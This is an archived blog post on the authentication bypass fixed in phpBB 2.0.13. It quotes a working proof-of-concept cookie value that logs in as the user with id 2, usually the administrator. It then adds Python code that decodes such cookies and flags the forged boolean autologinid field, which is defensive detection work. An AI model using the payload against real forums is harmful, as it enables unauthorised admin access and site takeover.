This post was imported from an old blog archive, and predates the creation of AdamCaudill.com.
In the latest round of embarrassing updates, the phpBB Group has released a new version of phpBB, 2.0.13, to fix a large and obvious security error that allows anyone to gain admin rights. Oh, and just to make it better, it works on all versions < 2.0.13. With a POC floating around, let the hacking begin.
Update: A working exploit was released, showing just how simple it is to wreak havoc.
This is yet another blow to phpBB; it's had a number of recent issues like this, which makes you wonder how long it'll take for them to actually take security seriously.
An exploit is not required.
The following proof of concept demonstrating cookie values necessary to authenticate to the numerical id ‘2’ account, typically the administrator account, is available:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
(Source)
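URL-decoded, the proof-of-concept cookie value above is the PHP-serialized array a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}, in which autologinid is the boolean true rather than a string. The Python below is an added example, not code from the original post or from phpBB: it parses such a cookie value and flags a non-string autologinid, which is a check that can be run over captured request cookies. It assumes a legitimate cookie stores autologinid as a string; NORMAL_COOKIE is a constructed sample and the function names are hypothetical.

```python
from urllib.parse import unquote

# Proof-of-concept value quoted in the post.
POC_COOKIE = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B"
              "s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D")
# Constructed sample: autologinid carried as a 32-character string.
NORMAL_COOKIE = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22" + "0" * 32 +
                 "%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%225%22%3B%7D")

def parse(data, pos=0):
    """Parse one PHP-serialized value (a, s, b, i, N only); return (value, next_pos)."""
    tag = data[pos]
    if tag == "N":                      # N;
        return None, pos + 2
    if tag in "bi":                     # b:1;  i:42;
        end = data.index(";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == "b" else num), end + 1
    if tag == "s":                      # s:<len>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2               # skip the colon and opening quote
        return data[start:start + length], start + length + 2
    if tag == "a":                      # a:<count>:{<key><value>...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos, out = colon + 2, {}
        for _ in range(count):
            key, pos = parse(data, pos)
            out[key], pos = parse(data, pos)
        return out, pos + 1             # skip the closing brace
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")

def inspect_data_cookie(raw):
    """Return a list of findings for one URL-encoded session-data cookie value."""
    try:
        # latin-1 keeps one character per byte, matching PHP's byte lengths.
        value, _ = parse(unquote(raw, encoding="latin-1"))
    except (ValueError, IndexError, TypeError):
        return ["unparseable"]
    if not isinstance(value, dict):
        return ["not an array"]
    auto = value.get("autologinid", "")
    if not isinstance(auto, str):       # assumption: legitimate values are strings
        return [f"autologinid has type {type(auto).__name__}, expected string"]
    return []

if __name__ == "__main__":
    for name, raw in (("poc", POC_COOKIE), ("normal", NORMAL_COOKIE)):
        print(name, inspect_data_cookie(raw) or "ok")
```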
PHPBB Authentication Bypass Vulnerability
phpBB 2.0.13 released – Critical Update